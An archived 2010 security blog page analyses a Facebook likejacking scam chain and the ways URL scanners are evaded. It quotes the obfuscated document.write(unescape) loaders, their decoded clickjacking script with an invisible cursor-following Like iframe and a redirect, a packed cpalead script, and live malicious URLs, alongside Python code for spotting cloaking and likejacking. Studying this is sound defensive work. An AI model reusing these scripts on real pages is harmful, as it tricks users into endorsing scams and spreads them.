June 2010 Archives

As promised I have uploaded the slides and the corresponding advisory for my graudit talk at the ruxcon meetup this month.

Url scanning seems to be an emerging trend. Detecting malware distribution channels and preventing infections is easier than cleaning up the mess they make. The basis of the idea is good, but the current implementations. I have been mulling on this for a while, ever since I read Russ McRae's post (rant?) on url shorteners needing to detect malware.

The initial problems that url scanners face are simple evasion techniques, such as the click to get infected method that you can see in my previous post. This blogspot url scores quite cleanly.
[image: urlscanner-cleanly.jpg]
And why shouldn't it? It doesn't contain anything directly malicious and so it should score cleanly until reputation or reactive defense catches up with it. Listen, you say, who cares about the herding page; it doesn't do anything, it's the delivery page we care about. If a user visits a "benign" page that redirects him to malware, it will still be stopped at the malicious page!

Alas dear friend, a simple server side block is all it takes to stop http://scanner.novirusthanks.org from accessing the offending page (http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html).
[image: av-ip-ban-avoidance.jpg]
Other documented techniques seen in the wild include only delivering the malicious payload on 1 of x requests, user agent filtering, JavaScript obfuscation that breaks automated deobfuscation, and more. I have seen an alert box break browser automation, so there is no shortage of options for the bad guys. However, considering how simple it is to shut down today's url scanners, I doubt we will see too many advanced techniques yet. Url scanning might overcome these simple bypasses in the future, but it should not be considered a defense and certainly not a replacement for your desktop AV.
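The two cheapest bypasses above, blocking the scanner's own user agent and serving the payload on only 1 of x requests, are both visible to a scanner that fetches the same URL through several client profiles, several times, and compares what came back. The script below is an added example and is not code from this post or from any scanner; the profile strings, the `fetch(url, user_agent)` callback and the `simulated_fetch` stand-in are all constructed for the example, so it runs offline.

```python
import hashlib
import re
from collections import Counter

# Client profiles a scanner should impersonate (constructed for this example):
# a server-side user-agent filter only has to recognise the scanner's own UA.
PROFILES = {
    "scanner": "Mozilla/5.0 (compatible; example-urlscanner/1.0)",
    "ie8": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)",
    "firefox": "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:1.9.2) Gecko/20100115 Firefox/3.6",
}


def normalize(body):
    """Remove churn that legitimately differs between fetches (long numeric
    ids/timestamps, whitespace) so only real content differences survive."""
    body = re.sub(r"\d{8,}", "<num>", body)
    return re.sub(r"\s+", " ", body).strip()


def fingerprint(body):
    return hashlib.sha256(normalize(body).encode("utf-8")).hexdigest()


def detect_cloaking(fetch, url, profiles=PROFILES, repeats=3):
    """fetch(url, user_agent) -> (status, body) is supplied by the caller.
    Every profile fetches `repeats` times. The report names profiles that were
    blocked, profiles that never saw the majority content (UA cloaking), and
    profiles whose own repeats disagreed (1-of-x payload delivery)."""
    results = {}
    for name, ua in profiles.items():
        results[name] = [fetch(url, ua) for _ in range(repeats)]
    fps = {name: [fingerprint(body) for _, body in r] for name, r in results.items()}
    majority = Counter(fp for lst in fps.values() for fp in lst).most_common(1)[0][0]
    return {
        "blocked": sorted(n for n, r in results.items() if any(st >= 400 for st, _ in r)),
        "ua_cloaked": sorted(n for n, lst in fps.items() if all(fp != majority for fp in lst)),
        "unstable": sorted(n for n, lst in fps.items() if len(set(lst)) > 1),
    }


def simulated_fetch():
    """Constructed stand-in for a real HTTP fetch: blocks the scanner's UA,
    serves the payload to every third IE request, and is benign otherwise."""
    counter = {"ie8": 0}

    def fetch(url, user_agent):
        if "urlscanner" in user_agent:
            return 403, "Forbidden"
        if "MSIE" in user_agent:
            counter["ie8"] += 1
            if counter["ie8"] % 3 == 0:
                return 200, "<html><body>benign</body><script src='top.js'></script></html>"
        return 200, "<html><body>benign</body></html>"

    return fetch


if __name__ == "__main__":
    print(detect_cloaking(simulated_fetch(), "http://example.invalid/"))
```

A profile that lands in `ua_cloaked` or `blocked` means the scanner's verdict for that URL rests on content a real victim never sees; `unstable` means one fetch is not enough to clear the page. Neither says the page is malicious, only that a clean score from a single fetch is not worth much.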

[image: rabbithole.png]
Today I noticed this one in my facebook feed and thought: that's different! It's been a while since I chased a rabbit, so down the rabbit hole I went.
~$ GET http://craziestattoos.blogspot.com/

<meta property="og:title" content="The Guy With The Largest Dick On The Planet">
<meta property="og:type" content="article">
<meta property="og:url" content="http://craziestattoos.blogspot.com/"><link rel="me" href="http://www.blogger.com/profile/09319063164064567908">
<link rel="openid.server" href="http://www.blogger.com/openid-server.g">
<!-- --><style type="text/css">@import url(http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css);
div.b-mobile {display:none;}
</style>

<script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener("load",
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F" marginwidth="0" marginheight="0" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search" frameborder="0" height="30" scrolling="no" width="100%"></iframe>
<div></div>
<center><a href="http://access.im/1/AzO93"><img src="http://i46.tinypic.com/33ygjk6.jpg" /></a></center>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/4161557039-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
The blogspot page delivers an access.im link, visible as a "skip this add page" image, and redirects to http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html when you click on it. Let's head further down the burrow:
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script src="top.js" type="text/javascript"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
</style>
<center><img src="18.png" /></center>
<center><div class="faq-answer" id="faq-1"><img src="pre.jpg"></div></center>
<script src="bottom.js" type="text/javascript"></script>  
</body>
Looks pretty normal, right? I took a look at the jquery.js and at a cursory glance it looks authentic, but then top.js delivers the first rabbit droppings:
~$ GET http://allhqpics.com/top.js
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->
Decoding that string gives us:
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 500);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" ) 
    {
        clearInterval(interval);
        iflag=1;
        document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html"; 
    }    
}  
        </script>
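Both top.js and bottom.js hide their real content behind a single `document.write(unescape('%3C...'))` wrapper, and the cpalead script further down uses the other common trick, `\xNN`-escaped string arrays indexed by position. Neither needs a browser to decode. The following script is an added example, not code from this post; it peels the `unescape` layer statically (mimicking JavaScript's byte-wise `unescape`, including `%uXXXX`) and inlines string-array lookups. The `build_sample` input is constructed for the example; the string-array sample in the usage note is the `_0x96be` snippet from the cpalead script on this page.

```python
import re
from urllib.parse import quote, unquote

DOC_WRITE_UNESCAPE = re.compile(
    r"""document\.write\(\s*unescape\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.S)
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
STRING_ARRAY = re.compile(r"var\s+(\w+)\s*=\s*\[([^\]]*)\]\s*;")
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")


def js_unescape(s):
    """Mimic JavaScript's legacy unescape(): %uXXXX is a UTF-16 code unit and
    %XX is one byte (Latin-1), which is not what a UTF-8 unquote would give."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def peel_document_write(js):
    """Replace each document.write(unescape('...')) with the markup it would
    inject, repeating until no layer is left. Returns (text, layers_peeled)."""
    layers = 0
    while True:
        m = DOC_WRITE_UNESCAPE.search(js)
        if m is None:
            return js, layers
        js = js[:m.start()] + js_unescape(m.group(2)) + js[m.end():]
        layers += 1


def decode_hex_escapes(js):
    """Turn \\x72\\x65... inside string literals into readable characters."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), js)


def resolve_string_arrays(js):
    """Inline NAME[n] lookups into a string array, so that
    window[_0x96be[1]][_0x96be[0]]() reads window["location"]["reload"]().
    Simplification: array literals are assumed not to contain ']' in a string."""
    js = decode_hex_escapes(js)
    for m in STRING_ARRAY.finditer(js):
        name = m.group(1)
        items = [content for _, content in STRING_LITERAL.findall(m.group(2))]
        if not items:
            continue

        def inline(ref, items=items):
            i = int(ref.group(1))
            return '"%s"' % items[i] if i < len(items) else ref.group(0)

        js = re.sub(r"\b%s\[(\d+)\]" % re.escape(name), inline, js)
    return js


def build_sample():
    """Constructed two-layer sample in the shape of top.js/bottom.js: the outer
    layer decodes to another document.write(unescape(...)) call."""
    inner = "document.write(unescape('%3Cdiv%20id%3D%22x%22%3E'))"
    return "<!--\ndocument.write(unescape('" + quote(inner, safe="") + "'))\n//-->"


if __name__ == "__main__":
    text, layers = peel_document_write(build_sample())
    print(layers, text)
    print(resolve_string_arrays(
        r'var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];'
        r'window[_0x96be[1]][_0x96be[0]]()'))
```

Because nothing is executed, this works on a file that was fetched with a plain GET and never rendered, which is exactly the position a URL scanner is in. The Latin-1 choice matters: a `%E9` in a payload is one character to `unescape`, and decoding it as UTF-8 would either raise or silently change the bytes a signature is matched against.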
I'll get back to the second html page in a bit, first let's check bottom.js from the first page:
~$ GET http://allhqpics.com/bottom.js
<!--
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%
73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73
%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->
Which decodes to:
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event) 
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    } 
    else 
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
        else
        {
        icontainer.style.display = 'none'; }
    }

    </script>
This gets a little more interesting: now there is a CSRF request to facebook for you to like the malicious site and lure more unsuspecting victims. The Like iframe sits in a div with opacity 0 that is moved under the cursor on every mousemove, so whatever the user clicks lands on the Like button, and top.js polls document.activeElement so the page knows when the click has gone through and can redirect. It's time to pick up the pace and move on.
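Everything that makes this a likejack rather than a Like button is visible in the decoded markup: a facebook.com/plugins/like.php iframe, an enclosing element with opacity 0, a mousemove handler that rewrites `style.top`/`style.left`, and a poll of `document.activeElement`. A scanner can look for that combination statically. The checker below is an added example and not code from this post; the indicator names and thresholds are my own, `SAMPLE_LIKEJACK` is a trimmed copy of the decoded bottom.js and top.js from this page, and `SAMPLE_BENIGN` is a constructed ordinary Like button.

```python
import re

LIKE_IFRAME = re.compile(
    r"""<iframe\b[^>]*\bsrc\s*=\s*["'][^"']*facebook\.com/plugins/like\.php""", re.I)
OPEN_DIV = re.compile(r"<div\b[^>]*>", re.I)
# opacity 0 or 0.0 (CSS form or the IE filter form) or visibility:hidden, but not 0.8
INVISIBLE = re.compile(r"opacity\s*[:=]\s*0(?:\.0+)?(?![\d.])|visibility\s*:\s*hidden", re.I)
MOUSE_HANDLER = re.compile(r"""onmousemove|addEventListener\(\s*['"]mousemove""", re.I)
REPOSITION = re.compile(r"\.style\.(?:top|left)\s*=")
FOCUS_POLL = re.compile(r"document\.activeElement")


def likejacking_indicators(html):
    """Return the indicators found, in the order they are checked. Input is the
    page after any document.write(unescape(...)) layer has been decoded."""
    found = []
    m = LIKE_IFRAME.search(html)
    if m is None:
        return found
    found.append("like_iframe")
    iframe_tag = html[m.start():html.find(">", m.start()) + 1]
    divs = OPEN_DIV.findall(html[:m.start()])      # nearest enclosing <div ...>
    container = divs[-1] if divs else ""
    if INVISIBLE.search(iframe_tag) or INVISIBLE.search(container):
        found.append("invisible_like")
    if MOUSE_HANDLER.search(html) and REPOSITION.search(html):
        found.append("follows_cursor")
    if FOCUS_POLL.search(html):
        found.append("polls_focus")
    return found


def is_likejacking(html):
    ind = likejacking_indicators(html)
    return "like_iframe" in ind and ("invisible_like" in ind or "follows_cursor" in ind)


# Trimmed from the decoded bottom.js and top.js shown above.
SAMPLE_LIKEJACK = """
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');
    function mouseFollower(e){
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);} else { icontainer.style.display = 'none'; }
    }
</script>
<script type="text/javascript">
function updateActiveElement() {
    if ( $(document.activeElement).attr('id')=="fbframe" ) { clearInterval(interval); iflag=1; }
}
</script>
"""

# Constructed ordinary Like button for comparison.
SAMPLE_BENIGN = """
<div class="share"><iframe src="http://www.facebook.com/plugins/like.php?href=http://example.invalid/"
 scrolling="no" frameborder="0" style="border:none; width:450px; height:80px;"></iframe></div>
"""

if __name__ == "__main__":
    print(likejacking_indicators(SAMPLE_LIKEJACK), is_likejacking(SAMPLE_LIKEJACK))
    print(likejacking_indicators(SAMPLE_BENIGN), is_likejacking(SAMPLE_BENIGN))
```

The regexes are deliberately loose (no HTML parser, nearest preceding `<div>` as the container) because obfuscated pages are rarely well-formed; the point is that the Like iframe alone is not an indicator, the invisible container and cursor tracking are.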
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
<style>
<center><a href="#" name="faq-1"><img src="pre.jpg"></a></center>
<center></a><div class="faq-answer" id="faq-1"><a href="#" name="faq-1"><img src="hero.jpg"></div></center>  
</body>
And the reference to cpalead gives it away. That url delivers your typical function(p,a,c,k,e,d) obfuscated javascript, which we decode using the Tom Liston method (replace the eval with a document.write into a textarea):
function showme(txt) {
	document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); 
}

//Copyright 2010 CPAlead.com

showme(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 124={"123":[{"13":"224=","18":"99","66":"0"},{"13":"200=","18":"50","66":"0"},{"13":"225=","18":"30","66":"0"},{"13":"222=","18":"95","66":"0"}]};9 76(7,189){90(6 65=0;65<124.123.97;65++){4(124.123[65].13==231(7)){153 124.123[65][189]}}}6 108=\'\';6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175=\'79\';6 249=\'242 246 230 228 227 62 239 240 243.\';9 251(113){6 133=19.128;4(247 19.128!=\'9\'){19.128=113}12{19.128=9(){4(133){241{133()}234(235){}}4(113){113()}}}}9 114(7){6 88=2.81("20").207(0);4(88==237){59=59+300;48("114(\'"+7+"\');",300)}12{199(7)}}9 226(7){4(108>0){59=59+108+\'155\';48("114(\'"+7+"\');",108+\'155\')}12{59=59+300;48("114(\'"+7+"\');",300)}}9 177(41){78=2.81(\'64\');90(8=0;8!=78.97;8++){4(78[8].13!=\'24\'){4(41==0){78[8].3.33=\'86\'}4(41==1){78[8].3.33=\'47\'}}}}9 140(41){6 211=2.81(\'236\');90(6 209=2.211,8=0,22;22=209[8];8++){4(22.13!=\'170\'&&22.13!=\'159\'){4(41==0){4(195.198==\'212 220 215\'){22.73(\'87\',\'25\');22.3.33=\'86\'}12{22.73(\'87\',\'25\');6 196=22.252,139=22.244;139.233(22);139.201(22,196)}}4(41==1){22.73(\'87\',\'19\');4(195.198==\'212 220 215\'){22.3.33=\'47\'}}}}}9 150(41){49=2.81(\'238\');90(8=0;8!=49.97;8++){4(49[8].13!=\'170\'&&49[8].13!=\'159\'){4(41==0){49[8].73(\'87\',\'25\');49[8].3.33=\'86\'}4(41==1){49[8].3.33=\'47\';49[8].73(\'87\',\'19\')}}}}9 96(){6 68,61;4(19.104&&19.184){68=19.176+19.223;61=19.104+19.184}12 4(2.20.183>2.20.60){68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4(137.104){14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89){14=2.74.98;58=2.74.89}12 4(2.20){14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263(180,181,14,58)}9 141(){6 
51=96();4((51[1]-2.5(\'11\').3.23.218("130",""))>30){2.5(\'11\').3.23=(51[1]+\'130\')}4(149==0){48("141();",169)}}9 77(7,178){4(178!=175){34.213.291=\'37://71.43.46/290.72?82=83\'}6 15=2.5(\'11\');6 26=2.5(\'35\');140(1);150(1);177(1);149=1;102=75;4(76(7,\'66\')==1&&191!=75){15.3.120="118(18=0)";15.3.18="0.0";2.5(\'24\').44=\'37://71.292.293/294-109.72\';191=75}12{26.3.21=\'42\';15.3.21=\'42\';2.5(\'24\').44=\'289:288\';2.5(\'24\').3.21=\'42\'}153 85}9 57(174){4(!102&&131){4(19.188&&19.188.185){6 147=1}12{6 147=0}67=146 173();67.44="37://71.43.46/62-145.72?82=83&185="+147+"&145="+174;2.20.161(67);164()}}9 151(148){4(!102&&131){67=146 173();67.44="37://71.43.46/62-145-283.72?82=83&148="+148;2.20.161(67);194(\'37://71.43.46/282.72?82=83\')}}9 156(){4(!2.5(\'11\')){57(\'109-110-132\')}12 4(!2.5(\'35\')){57(\'62-110-132\')}12 4(!2.5(\'24\')){57(\'64-110-132\')}12 4(2.5(\'11\').3.17!="100%"||2.5(\'11\').3.21!="55"||2.5(\'11\').3.33!="47"){57(\'109-163\')}12 4(2.5(\'35\').3.17!="100%"||2.5(\'35\').3.21!="55"||2.5(\'35\').3.33!="47"){57(\'62-163\')}12 4(2.5(\'24\').3.21!="55"){57(\'64-110-47\')}4(2.5(\'24\').60<=300&&2.5(\'24\').60!=0){151(\'64-23-158-\'+2.5(\'24\').60)}12 4(2.5(\'11\').60<=100&&2.5(\'11\').89<=100){151(\'109-23-158-\'+2.5(\'11\').60+\'-\'+2.5(\'11\').89)}48("156()",172)}9 164(){6 143=["\\168\\165\\136\\84\\134\\284","\\136\\84\\167\\134\\187\\204\\84\\216"];19[143[1]][143[0]]()}9 194(217){6 154=["\\296\\168\\165\\287","\\136\\84\\167\\134\\187\\204\\84\\216"];34[154[1]][154[0]]=217}9 219(7){2.5(\'24\').286.213.218(\'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298)+\'\')}9 214(7){6 51=96();6 88=2.81("20").207(0);6 15=2.253("10");15.73(\'13\',\'11\');15.3.21=\'42\';15.3.28=\'121\';15.3.34=\'0\';15.3.202=\'0\';15.3.197=\'301\';15.3.17=\'100%\';88.201(15,88.303);142=76(7,\'18\');92=142/100;2.5(\'11\').3.120="118(18="+142+")";2.5(\'11\').3.18=92;15.3.23=(51[1]+\'130\');15.3.21=\'55\';15.3.33=\'47\'}9 199(7){6 
